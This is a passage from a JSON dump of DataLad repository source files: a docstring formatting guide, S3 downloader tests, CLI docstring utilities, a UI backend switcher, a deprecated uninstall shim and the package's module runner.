the command line API\n\nA common source docstring is transformed, amended and tuned specifically for\neach consumption scenario.\n\n\nFormatting overview and guidelines\n==================================\n\nIn general, the docstring format follows the `NumPy standard <https://numpydoc.readthedocs.io/en/latest/format.html#docstring-standard>`_.\nIn addition, we follow the guidelines of `Restructured Text <https://docutils.sourceforge.io/docs/user/rst/quickstart.html>`_ with the additional features and treatments provided by `Sphinx <https://www.sphinx-doc.org/en/master>`_, and some custom formatting outlined below.\n\nVersion information\n-------------------\n\nAdditions, changes, or deprecation should be recorded in a docstring using the\nstandard Sphinx directives ``versionadded``, ``versionchanged``,\n``deprecated``::\n\n .. deprecated:: 0.16\n The ``dryrun||--dryrun`` option will be removed in a future release, use\n the renamed ``dry_run||--dry-run`` option instead.\n\n\nAPI-conditional docs\n--------------------\n\nThe ``CMD`` and ``PY`` macros can be used to selectively include documentation\nfor specific APIs only::\n\n options to pass to :command:`git init`. [PY: Options can be given as a list\n of command line arguments or as a GitPython-style option dictionary PY][CMD:\n Any argument specified after the destination path of the repository will be\n passed to git-init as-is CMD].\n\nFor API-alternative command and argument specifications the following format\ncan be used::\n\n ``<python-api>||<cmdline-api``\n\nwhere the double backticks are mandatory and ``<python-part>`` and\n``<cmdline-part>`` represent the respective argument specification for each\nAPI. 
In these specifications only valid argument/command names are allowed,\nplus a comma character to list multiples, and the dot character to include an\nellipsis::\n\n ``github_organization||-g,--github-organization``\n\n ``create_sibling_...||create-sibling-...``\n\n\nReflow text\n-----------\n\nWhen automatic transformations negatively affect the presentation of a\ndocstring due to excessive removal of content, leaving \"holes\", the ``REFLOW``\nmacro can be used to enclose such segments, in order to reformat them\nas the final processing step. Example::\n\n || REFLOW >>\n The API has been aligned with the some\n ``create_sibling_...||create-sibling-...`` commands of other GitHub-like\n services, such as GOGS, GIN, GitTea.<< REFLOW ||\n\nThe start macro must appear on a dedicated line.\n" }, { "alpha_fraction": 0.6613961458206177, "alphanum_fraction": 0.685824990272522, "avg_line_length": 41.30434799194336, "blob_id": "fd618753683c4a4c7474c56ecef59e3d40a61222", "content_id": "bdc895854899adedaf4c8bed48cb2f6a865d5e3e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12649, "license_type": "permissive", "max_line_length": 150, "num_lines": 299, "path": "/datalad/downloaders/tests/test_s3.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for S3 downloader\"\"\"\n\nimport os\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom ...downloaders.base import DownloadError\nfrom ...support import path as op\nfrom ...support.exceptions import AccessDeniedError\nfrom ...tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_raises,\n integration,\n skip_if_no_module,\n skip_if_no_network,\n swallow_outputs,\n turtle,\n use_cassette,\n with_tempfile,\n with_testsui,\n)\nfrom ...utils import md5sum\nfrom ..providers import Providers # to test against crcns\nfrom ..s3 import (\n S3Authenticator,\n S3Downloader,\n)\nfrom .test_http import check_download_external_url\nfrom .utils import get_test_providers\n\nskip_if_no_module('boto')\nskip_if_no_network() # TODO: provide persistent vcr fixtures for the tests\n\nurl_2versions_nonversioned1 = 's3://datalad-test0-versioned/2versions-nonversioned1.txt'\nurl_2versions_nonversioned1_ver1 = url_2versions_nonversioned1 + '?versionId=null'\nurl_2versions_nonversioned1_ver2 = url_2versions_nonversioned1 + '?versionId=V4Dqhu0QTEtxmvoNkCHGrjVZVomR1Ryo'\nurl_1version_bucketwithdot = 's3://datalad.test1/version1.txt'\n\nurl_dandi1 = 's3://dandiarchive/dandiarchive/dandiarchive/data/d8dd3e2b-8f74-494b-9370-9e3a6c69e2b0.csv.gz?versionId=9P7aMTvTT5wynPBOtiQqkV.wvV8zcpLf'\n\n\n# disabled due to https://github.com/datalad/datalad/issues/7465\n# @use_cassette('test_s3_download_basic')\[email protected](\"url,success_str,failed_str\", [\n (url_2versions_nonversioned1, 'version2', 'version1'),\n (url_2versions_nonversioned1_ver2, 'version2', 'version1'),\n (url_2versions_nonversioned1_ver1, 'version1', 'version2'),\n (url_1version_bucketwithdot, 'version1', 'nothing'),\n])\ndef test_s3_download_basic(url, success_str, failed_str):\n check_download_external_url(url, 
failed_str, success_str)\n\n\n# TODO: redo smart way with mocking, to avoid unnecessary CPU waste\n@use_cassette('test_s3_mtime')\n@with_tempfile\ndef test_mtime(tempfile=None):\n url = url_2versions_nonversioned1_ver2\n with swallow_outputs():\n # without allow_old=False it might be reusing previous connection\n # which had already vcr tape for it, leading to failure.\n # TODO: make allow_old configurable and then within tests disallow\n # allow_old\n get_test_providers(url).download(url, path=tempfile, allow_old_session=False)\n assert_equal(os.stat(tempfile).st_mtime, 1446873817)\n\n # and if url is wrong\n url = 's3://datalad-test0-versioned/nonexisting'\n assert_raises(DownloadError, get_test_providers(url).download, url, path=tempfile, overwrite=True)\n\n\n@use_cassette('test_s3_reuse_session')\n@with_tempfile\n# forgot how to tell it not to change return value, so this side_effect beast now\[email protected](S3Authenticator, 'authenticate', side_effect=S3Authenticator.authenticate, autospec=True)\ndef test_reuse_session(tempfile=None, mocked_auth=None):\n Providers.reset_default_providers() # necessary for the testing below\n providers = get_test_providers(url_2versions_nonversioned1_ver1) # to check credentials\n with swallow_outputs():\n providers.download(url_2versions_nonversioned1_ver1, path=tempfile)\n assert_equal(mocked_auth.call_count, 1)\n\n providers2 = Providers.from_config_files()\n with swallow_outputs():\n providers2.download(url_2versions_nonversioned1_ver2, path=tempfile, overwrite=True)\n assert_equal(mocked_auth.call_count, 1)\n\n # but if we reload -- everything reloads and we need to authenticate again\n providers2 = Providers.from_config_files(reload=True)\n with swallow_outputs():\n providers2.download(url_2versions_nonversioned1_ver2, path=tempfile, overwrite=True)\n assert_equal(mocked_auth.call_count, 2)\n\n Providers.reset_default_providers() # necessary to avoid side-effects from having a vcr'ed connection\n # leaking through default provider's bucket, e.g. breaking test_mtime if ran after this one\n\n\ndef test_parse_url():\n from ..s3 import S3Downloader\n f = S3Downloader._parse_url\n b1 = \"s3://bucket.name/file/path?revision=123\"\n assert_equal(f(b1, bucket_only=True), 'bucket.name')\n assert_equal(f(b1), ('bucket.name', 'file/path', {'revision': '123'}))\n assert_equal(f(\"s3://b/f name\"), ('b', 'f name', {}))\n assert_equal(f(\"s3://b/f%20name\"), ('b', 'f name', {}))\n assert_equal(f(\"s3://b/f%2Bname\"), ('b', 'f+name', {}))\n assert_equal(f(\"s3://b/f%2bname?r=%20\"), ('b', 'f+name', {'r': '%20'}))\n\n\n@with_testsui(interactive=True)\ndef test_deny_access():\n downloader = S3Downloader(authenticator=S3Authenticator())\n\n def deny_access(*args, **kwargs):\n raise AccessDeniedError\n\n with assert_raises(DownloadError):\n with patch.object(downloader, '_download', deny_access):\n downloader.download(\"doesn't matter\")\n\n\n@with_tempfile\ndef test_boto_host_specification(tempfile=None):\n # This test relies on a yoh-specific set of credentials to access\n # s3://dandiarchive . Unfortunately it seems that boto (2.49.0-2.1) might\n # have difficulties to establish a proper connection and would blow\n # with\n # The authorization mechanism you have provided is not supported. 
Please use AWS4-HMAC-SHA256.\n # Some related discussions:\n # https://github.com/jschneier/django-storages/issues/28 which was closed\n # as superseded by a fix in 2017\n # https://github.com/jschneier/django-storages/issues/28 .\n # In my case I still needed to resort to the workaround of providing\n # host = 's3.us-east-2.amazonaws.com' to the call.\n #\n # Unfortunately I do not know yet how we could establish such tests without\n # demanding specific credentials. And since we overload HOME for the testing,\n # the only way to run/test this at least when testing on my laptop is:\n credfile = '/home/yoh/.config/datalad/providers/dandi.cfg'\n # Later TODO: manage to reproduce such situation with our dedicated test\n # bucket, and rely on datalad-test-s3 credential\n if not op.exists(credfile):\n raise SkipTest(\"Test can run only on yoh's setup\")\n providers = Providers.from_config_files([credfile])\n with swallow_outputs():\n providers.download(url_dandi1, path=tempfile)\n assert_equal(md5sum(tempfile), '97f4290b2d369816c052607923e372d4')\n\n\n# disabled due to https://github.com/datalad/datalad/issues/7464\ndef disabled_test_restricted_bucket_on_NDA():\n get_test_providers('s3://NDAR_Central_4/', reload=True) # to verify having credentials to access\n for url, success_str, failed_str in [\n (\"s3://NDAR_Central_4/submission_23075/README\", 'BIDS', 'error'),\n (\"s3://NDAR_Central_4/submission_23075/dataset_description.json\", 'DA041147', 'error'),\n ]:\n check_download_external_url(url, failed_str, success_str)\n\n\n# disabled due to https://github.com/datalad/datalad/issues/7464\n@use_cassette('test_download_multiple_NDA')\n@with_tempfile(mkdir=True)\ndef disabled_test_download_multiple_NDA(outdir=None):\n # This would smoke/integration test logic for composite credential testing expiration\n # of the token while reusing session from first url on the 2nd one\n urls = [\n \"s3://NDAR_Central_4/submission_23075/README\",\n \"s3://NDAR_Central_4/submission_23075/dataset_description.json\",\n ]\n providers = get_test_providers(urls[0], reload=True) # to verify having credentials to access\n\n for url in urls:\n ret = providers.download(url, outdir)\n\n\n# disabled due to https://github.com/datalad/datalad/issues/7465\n# @use_cassette('test_get_key')\[email protected](\"b,key,version_id\", [\n # disabled due to https://github.com/datalad/datalad/issues/7464\n # ('NDAR_Central_4', 'submission_23075/README', None),\n ('datalad-test0-versioned', '1version-nonversioned1.txt', None),\n ('datalad-test0-versioned', '3versions-allversioned.txt', None),\n ('datalad-test0-versioned', '3versions-allversioned.txt', 'pNsV5jJrnGATkmNrP8.i_xNH6CY4Mo5s'),\n])\ndef test_get_key(b, key, version_id):\n url = \"s3://%s/%s\" % (b, key)\n if version_id:\n url += '?versionId=' + version_id\n providers = get_test_providers(url, reload=True) # to verify having credentials to access\n downloader = providers.get_provider(url).get_downloader(url)\n downloader._establish_session(url)\n\n keys = [f(key, version_id=version_id)\n for f in (downloader._bucket.get_key,\n downloader._get_key_via_get)]\n # key1 != key2 probably due to some reasons, so we will just compare fields we care about\n for f in ['name', 'version_id', 'size', 'content_type', 'last_modified']:\n vals = [getattr(k, f) for k in keys]\n assert_equal(*vals, msg=\"%s differs between two keys: %s\" % (f, vals))\n\n\n# not really to be ran as part of the tests since it does\n# largely nothing but wait for token to expire!\n# It is still faster than waiting 
for real case to crash\n@turtle # over 900 sec since that is the min duration for token\n@integration\n@with_tempfile(mkdir=True)\ndef _test_expiring_token(outdir):\n url = \"s3://datalad-test0-versioned/1version-removed-recreated.txt\"\n outpath = op.join(outdir, \"output\")\n providers = get_test_providers(url, reload=True)\n downloader = providers.get_provider(url).get_downloader(url)\n\n from time import (\n sleep,\n time,\n )\n\n from datalad.downloaders.credentials import (\n AWS_S3,\n CompositeCredential,\n UserPassword,\n )\n from datalad.support.keyring_ import MemoryKeyring\n from datalad.tests.utils_pytest import ok_file_has_content\n credential = downloader.credential # AWS_S3('datalad-test-s3')\n\n # We will replace credential with a CompositeCredential which will\n # mint new token after expiration\n # crap -- duration must be no shorter than 900, i.e. 15 minutes --\n # too long to wait for a test!\n duration = 900\n\n generated = []\n def _gen_session_token(_, key_id=None, secret_id=None):\n from boto.sts.connection import STSConnection\n sts = STSConnection(aws_access_key_id=key_id,\n aws_secret_access_key=secret_id)\n # Note: without force_new=True it will not re-request a token and would\n # just return old one if not expired yet. Testing below might fail\n # if not entirely new\n token = sts.get_session_token(duration=duration, force_new=True)\n generated.append(token)\n return dict(key_id=token.access_key, secret_id=token.secret_key,\n session=token.session_token,\n expiration=token.expiration)\n\n class CustomS3(CompositeCredential):\n _CREDENTIAL_CLASSES = (UserPassword, AWS_S3)\n _CREDENTIAL_ADAPTERS = (_gen_session_token,)\n\n keyring = MemoryKeyring()\n downloader.credential = new_credential = CustomS3(\"testexpire\", keyring=keyring)\n # but reuse our existing credential for the first part:\n downloader.credential._credentials[0] = credential\n\n # now downloader must use the token generator\n assert not generated # since we have not called it yet\n\n # do it twice so we reuse session and test that we do not\n # re-mint a new token\n t0 = time() # not exactly when we generated, might be a bit racy?\n for i in range(2):\n downloader.download(url, outpath)\n ok_file_has_content(outpath, \"version1\")\n os.unlink(outpath)\n # but we should have asked for a new token only once\n assert len(generated) == 1\n assert downloader.credential is new_credential # we did not reset it\n\n # sleep for a while and now do a number of downloads during which\n # token should get refreshed etc\n\n # -3 since we have offset -2 hardcoded to refresh a bit ahead of time\n to_sleep = duration - (time() - t0) - 3\n print(\"Sleeping for %d seconds. 
Token should expire at %s\" %\n (to_sleep, generated[0].expiration))\n sleep(to_sleep)\n\n for i in range(5):\n # should have not been regenerated yet\n # -2 is our hardcoded buffer\n if time() - t0 < duration - 2:\n assert len(generated) == 1\n downloader.download(url, outpath)\n ok_file_has_content(outpath, \"version1\")\n os.unlink(outpath)\n sleep(1)\n assert len(generated) == 2\n" }, { "alpha_fraction": 0.5669528841972351, "alphanum_fraction": 0.5746113061904907, "avg_line_length": 31.15671730041504, "blob_id": "ad22d0c2ec7b41fcc8d4392b0952817de4d97976", "content_id": "c60769bbd8883f379791317751adb243e60244d6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4309, "license_type": "permissive", "max_line_length": 86, "num_lines": 134, "path": "/datalad/cli/interface.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Utilities and definitions for DataLad command interfaces\"\"\"\n\n# TODO this should be a dochelper\nfrom datalad.interface.base import dedent_docstring\n\n# Some known extensions and their commands to suggest whenever lookup fails\n_known_extension_commands = {\n 'datalad-container': (\n 'containers-list', 'containers-remove', 'containers-add',\n 'containers-run'),\n 'datalad-crawler': ('crawl', 'crawl-init'),\n 'datalad-deprecated': (\n 'ls',\n 'metadata',\n 'search',\n 'aggregate-metadata',\n 'extract-metadata',\n ),\n 'datalad-neuroimaging': ('bids2scidata',)\n}\n\n_deprecated_commands = {\n 'add': \"save\",\n 'uninstall': 'drop',\n}\n\n\ndef get_cmd_ex(interface):\n \"\"\"Return the examples for the command defined by 'interface'.\n\n Parameters\n ----------\n interface : subclass of Interface\n \"\"\"\n from datalad.interface.base import build_example\n intf_ex = \"\\n\\n*Examples*\\n\\n\"\n for example in interface._examples_:\n intf_ex += build_example(example, api='cmdline')\n return intf_ex\n\n\ndef get_cmdline_command_name(intfspec):\n \"\"\"Given an interface specification return a cmdline command name\"\"\"\n if len(intfspec) > 2:\n name = intfspec[2]\n else:\n name = intfspec[0].split('.')[-1].replace('_', '-')\n return name\n\n\ndef alter_interface_docs_for_cmdline(docs):\n \"\"\"Apply modifications to interface docstrings for cmdline doc use.\"\"\"\n # central place to alter the impression of docstrings,\n # like removing Python API specific sections, and argument markup\n if not docs:\n return docs\n import re\n import textwrap\n\n docs = dedent_docstring(docs)\n # clean cmdline sections\n docs = re.sub(\n r'\\|\\| PYTHON \\>\\>.*?\\<\\< PYTHON \\|\\|',\n '',\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # clean cmdline in-line bits\n docs = re.sub(\n r'\\[PY:\\s.*?\\sPY\\]',\n '',\n docs,\n flags=re.MULTILINE | re.DOTALL)\n docs = re.sub(\n r'\\[CMD:\\s(.*?)\\sCMD\\]',\n lambda match: match.group(1),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n docs = re.sub(\n r'\\|\\| CMDLINE \\>\\>(.*?)\\<\\< CMDLINE \\|\\|',\n lambda match: match.group(1),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # remove :role:`...` RST markup for cmdline docs\n docs = re.sub(\n r':\\S+:`[^`]*`[\\\\]*',\n lambda match: ':'.join(match.group(0).split(':')[2:]).strip('`\\\\'),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # make the handbook doc references more accessible\n # the URL is a redirect configured at readthedocs\n docs = re.sub(\n r'(handbook:[0-9]-[0-9]*)',\n '\\\\1 (http://handbook.datalad.org/symbols)',\n docs)\n # remove None constraint. 
In general, `None` on the cmdline means don't\n # give option at all, but specifying `None` explicitly is practically\n # impossible\n docs = re.sub(\n r',\\sor\\svalue\\smust\\sbe\\s`None`',\n '',\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # capitalize variables and remove backticks to uniformize with\n # argparse output\n docs = re.sub(\n r'([^`]+)`([a-zA-Z0-9_]+)`([^`]+)',\n lambda match: f'{match.group(1)}{match.group(2).upper()}{match.group(3)}',\n docs)\n # select only the cmdline alternative from argument specifications\n docs = re.sub(\n r'``([a-zA-Z0-9_,.]+)\\|\\|([a-zA-Z0-9-,.]+)``',\n lambda match: f'``{match.group(2)}``',\n docs)\n # clean up sphinx API refs\n docs = re.sub(\n r'\\~datalad\\.api\\.\\S*',\n lambda match: \"`{0}`\".format(match.group(0)[13:]),\n docs)\n # dedicated support for version markup\n docs = docs.replace('.. versionadded::', 'New in version')\n docs = docs.replace('.. versionchanged::', 'Changed in version')\n docs = docs.replace('.. deprecated::', 'Deprecated in version')\n # Remove RST paragraph markup\n docs = re.sub(\n r'^.. \\S+::',\n lambda match: match.group(0)[3:-2].upper(),\n docs,\n flags=re.MULTILINE)\n docs = re.sub(\n r'^([ ]*)\\|\\| REFLOW \\>\\>\\n(.*?)\\<\\< REFLOW \\|\\|',\n lambda match: textwrap.fill(match.group(2), subsequent_indent=match.group(1)),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n return docs\n" }, { "alpha_fraction": 0.5704168081283569, "alphanum_fraction": 0.57259601354599, "avg_line_length": 31.776784896850586, "blob_id": "c20915a06600621436401b562b815593e13b1c34", "content_id": "72c7790a93cebb3fb2fb806413fc582821f20c26", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3671, "license_type": "permissive", "max_line_length": 87, "num_lines": 112, "path": "/datalad/ui/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interactive User Interface (as Dialog/GUI/etc) support\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom logging import getLogger\nlgr = getLogger('datalad.ui')\n\nlgr.log(5, \"Starting importing ui\")\n\nfrom .dialog import (\n ConsoleLog,\n DialogUI,\n IPythonUI,\n UnderAnnexUI,\n UnderTestsUI,\n SilentConsoleLog,\n QuietConsoleLog,\n)\nfrom ..utils import (\n is_interactive,\n get_ipython_shell,\n)\n\nKNOWN_BACKENDS = {\n 'console': ConsoleLog,\n 'dialog': DialogUI,\n 'ipython': IPythonUI,\n 'annex': UnderAnnexUI,\n 'tests': UnderTestsUI,\n 'tests-noninteractive': QuietConsoleLog,\n 'no-progress': SilentConsoleLog,\n}\n\n\n# TODO: implement logic on selection of the ui based on the cfg and environment\n# e.g. 
we cannot use DialogUI if session is not interactive\n# TODO: GitAnnexUI where interactive queries (such as question) should get to the\n# user by proxying some other appropriate (cmdline or GUI) UI, while others, such\n# as reporting on progress etc -- should get back to the annex\n\n\n# TODO: singleton\nclass _UI_Switcher(object):\n \"\"\"\n Poor man helper to switch between different backends at run-time.\n \"\"\"\n def __init__(self, backend=None):\n self._backend = None\n self._ui = None\n self.set_backend(backend)\n\n def set_backend(self, backend):\n if backend and (backend == self._backend):\n lgr.debug(\"not changing backend since the same %s\", backend)\n return\n if backend is None:\n # Might be IPython\n ipython_shell = get_ipython_shell()\n if ipython_shell:\n # Good old ipython would have TerminalInteractiveShell\n if ipython_shell.__class__.__name__ in ('ZMQInteractiveShell',):\n backend = 'ipython'\n # well -- this will not even be printed yet since unlikely\n # the lgr handlers were set already\n lgr.info(\n \"Detected IPython session. Setting UI backend to %r. \"\n \"If this is not a web IPython notebook session, you \"\n \"might like to datalad.ui.ui.set_backend('dialog'). \"\n \"Other known UI backends: %s\",\n backend, ', '.join(KNOWN_BACKENDS))\n else:\n backend = 'dialog'\n else:\n backend = 'dialog' if is_interactive() else 'no-progress'\n self._ui = KNOWN_BACKENDS[backend]()\n lgr.debug(\"UI set to %s\", self._ui)\n self._backend = backend\n\n @property\n def backend(self):\n return self._backend\n\n @property\n def ui(self):\n return self._ui\n\n # Delegate other methods to the actual UI\n def __getattribute__(self, key):\n if key.startswith('_') or key in {'set_backend', 'backend', 'ui'}:\n return super(_UI_Switcher, self).__getattribute__(key)\n return getattr(self._ui, key)\n\n def __setattr__(self, key, value):\n if key.startswith('_') or key in {'set_backend', 'backend', 'ui'}:\n return super(_UI_Switcher, self).__setattr__(key, value)\n return setattr(self._ui, key, value)\n\nlgr.log(5, \"Initiating UI switcher\")\n\nui = _UI_Switcher()\n\nlgr.log(5, \"Done importing ui\")\n" }, { "alpha_fraction": 0.5693690180778503, "alphanum_fraction": 0.5703051686286926, "avg_line_length": 33.019107818603516, "blob_id": "692922d7307daacd450297d0738a8cc4851be9c9", "content_id": "06914b5b8510b57eb7b26d79a14278b87f54b056", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5341, "license_type": "permissive", "max_line_length": 87, "num_lines": 157, "path": "/datalad/distribution/uninstall.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Thin shim around drop to preserve some backward-compatibility\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\n\nfrom datalad.support.param import Parameter\nfrom datalad.support.constraints import (\n EnsureStr,\n EnsureNone,\n)\nfrom datalad.distribution.dataset import (\n datasetmethod,\n require_dataset,\n Dataset,\n EnsureDataset,\n)\nfrom datalad.interface.base import Interface\nfrom datalad.interface.common_opts import (\n 
if_dirty_opt,\n recursion_flag,\n)\nfrom datalad.interface.utils import handle_dirty_dataset\nfrom datalad.interface.results import get_status_dict\nfrom datalad.interface.base import (\n build_doc,\n eval_results,\n)\nfrom datalad.utils import (\n ensure_list,\n)\nfrom datalad.core.local.status import get_paths_by_ds\n\n\nlgr = logging.getLogger('datalad.distribution.uninstall')\n\ndataset_argument = Parameter(\n args=(\"-d\", \"--dataset\"),\n metavar=\"DATASET\",\n doc=\"\"\"specify the dataset to perform the operation on.\n If no dataset is given, an attempt is made to identify a dataset\n based on the `path` given\"\"\",\n constraints=EnsureDataset() | EnsureNone())\n\n\ncheck_argument = Parameter(\n args=(\"--nocheck\",),\n doc=\"\"\"whether to perform checks to assure the configured minimum\n number (remote) source for data.[CMD: Give this\n option to skip checks CMD]\"\"\",\n action=\"store_false\",\n dest='check')\n\n\n@build_doc\nclass Uninstall(Interface):\n \"\"\"DEPRECATED: use the `drop` command\"\"\"\n _action = 'uninstall'\n\n _params_ = dict(\n dataset=dataset_argument,\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"path/name of the component to be uninstalled\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n recursive=recursion_flag,\n check=check_argument,\n if_dirty=if_dirty_opt,\n )\n\n @staticmethod\n @datasetmethod(name=_action)\n @eval_results\n def __call__(\n path=None,\n *,\n dataset=None,\n recursive=False,\n check=True,\n if_dirty='save-before'):\n # all this command does is to map legacy call to their replacement\n # with drop()\n import warnings\n warnings.warn(\n \"The `uninstall` command is deprecated and will be removed in \"\n \"a future release. \"\n \"Use the `drop` command for safer operation instead.\",\n DeprecationWarning)\n\n reckless = None\n if not check:\n # the old uninstall/drop combo had no checks beyond git-annex\n # key copy redundancy\n reckless = 'kill'\n\n paths_by_ds = None\n if (reckless == 'kill' and not recursive) or if_dirty != 'ignore':\n refds = require_dataset(dataset, check_installed=True,\n purpose='uninstall')\n # same path resolution that drop will do\n paths_by_ds, errors = get_paths_by_ds(\n refds, dataset, ensure_list(path),\n subdsroot_mode='sub')\n\n if reckless == 'kill' and not recursive:\n # drop requires recursive with kill\n # check check of the subdatasets to see if it is safe to enable it\n if all(not len(Dataset(d).subdatasets(\n state='absent',\n result_xfm='paths',\n return_type='list',\n result_renderer='disabled'))\n for d in paths_by_ds.keys()):\n # no dataset has any subdatasets, this is fine to set\n recursive = True\n # it has never made sense, but for \"compatibility\" reasons, and to keep\n # the \"old\" implementation slower, even it uses the new implementation\n if if_dirty != 'ignore':\n for d in paths_by_ds.keys():\n handle_dirty_dataset(Dataset(d), mode=if_dirty)\n\n from datalad.api import drop\n lgr.debug(\n \"Calling \"\n \"drop(dataset=%r, path=%r, recursive=%r, what='all', reckless=%r)\",\n dataset, path, recursive, reckless)\n for res in drop(\n path=path,\n dataset=dataset,\n recursive=recursive,\n what='all',\n reckless=reckless,\n return_type='generator',\n result_renderer='disabled',\n # we need to delegate the decision making to this uninstall shim\n on_failure='ignore'):\n if res['status'] == 'error':\n msg, *rest = res[\"message\"]\n if isinstance(msg, str) and \"--reckless availability\" in msg:\n # Avoid confusing datalad-uninstall callers with the 
new\n # drop parametrization while uninstall still exists.\n msg = msg.replace(\"--reckless availability\", \"--nocheck\")\n res[\"message\"] = (msg, *rest)\n yield res\n return\n" }, { "alpha_fraction": 0.5567468404769897, "alphanum_fraction": 0.5625, "avg_line_length": 31.683761596679688, "blob_id": "bbf218c9aa8c21b8c99efe48b57b7928a9f19aaa", "content_id": "87f34cb542b591bd1d68df0f91d046667e9a5759", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3824, "license_type": "permissive", "max_line_length": 94, "num_lines": 117, "path": "/datalad/__main__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Helper to use datalad as a \"runnable\" module with -m datalad\"\"\"\n\nimport sys\nfrom . import __version__\nfrom .log import lgr\n\n\ndef usage(outfile, executable=sys.argv[0]):\n if '__main__.py' in executable:\n # That was -m datalad way to launch\n executable = \"%s -m datalad\" % sys.executable\n outfile.write(\"\"\"Usage: %s [OPTIONS] <file> [ARGS]\n\nPurpose:\n To provide FUSE-like operation whenever necessary files\n (as accessed by open, h5py.File) are requested, they get\n fetched.\n\nMeta-options:\n--help Display this help then exit.\n--version Output version information then exit.\n\"\"\" % executable)\n\n\ndef runctx(cmd, globals=None, locals=None):\n if globals is None:\n globals = {}\n if locals is None:\n locals = {}\n\n try:\n exec(cmd, globals, locals)\n finally:\n # good opportunity to avoid atexit I guess. pass for now\n pass\n\n\ndef main(argv=None):\n import os\n import getopt\n\n if argv is None:\n argv = sys.argv\n\n try:\n opts, prog_argv = getopt.getopt(argv[1:], \"\", [\"help\", \"version\"])\n # TODO: support options for whatever we would support ;)\n # probably needs to hook in somehow into commands/options available\n # under cmdline/\n except getopt.error as msg:\n sys.stderr.write(\"%s: %s\\n\" % (sys.argv[0], msg))\n sys.stderr.write(\"Try `%s --help' for more information\\n\"\n % sys.argv[0])\n sys.exit(1)\n\n # and now we need to execute target script \"manually\"\n # Borrowing up on from trace.py\n for opt, val in opts:\n if opt == \"--help\":\n usage(sys.stdout, executable=argv[0])\n sys.exit(0)\n\n if opt == \"--version\":\n sys.stdout.write(\"datalad %s\\n\" % __version__)\n sys.exit(0)\n\n try:\n from datalad_deprecated.auto import AutomagicIO\n except Exception as e:\n # we could just test for ModuleNotFoundError (which should be\n # all that would happen with PY3.6+, but be a little more robust\n # and use the pattern from duecredit\n if type(e).__name__ not in ('ImportError', 'ModuleNotFoundError'):\n lgr.error(\"Failed to import datalad_deprecated.auto \"\n \"due to %s\", str(e))\n sys.stderr.write(\"{}\\n\".format(\n \"The DataLad AutomagicIO functionality has been moved to an \"\n \"extension package. 
Please install the Python package \"\n \"`datalad_deprecated` to be able to use it.\"))\n sys.exit(1)\n\n sys.argv = prog_argv\n progname = prog_argv[0]\n sys.path[0] = os.path.split(progname)[0]\n\n try:\n with open(progname) as fp:\n code = compile(fp.read(), progname, 'exec')\n # try to emulate __main__ namespace as much as possible\n globs = {\n '__file__': progname,\n '__name__': '__main__',\n '__package__': None,\n '__cached__': None,\n }\n # Since used explicitly -- activate the beast\n aio = AutomagicIO(activate=True)\n lgr.info(\"Running code of %s\", progname)\n runctx(code, globs, globs)\n # TODO: see if we could hide our presence from the final tracebacks if execution fails\n except IOError as err:\n lgr.error(\"Cannot run file %r because: %s\", sys.argv[0], err)\n sys.exit(1)\n except SystemExit:\n pass\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.583229660987854, "alphanum_fraction": 0.5877901911735535, "avg_line_length": 28.5950927734375, "blob_id": "64edb8c43ca7de4ae22a5cd8b2a18a87fc8d4030", "content_id": "cca9ef6324808b04381fa5192f65bdc6267a0405", "detected_licenses": [ 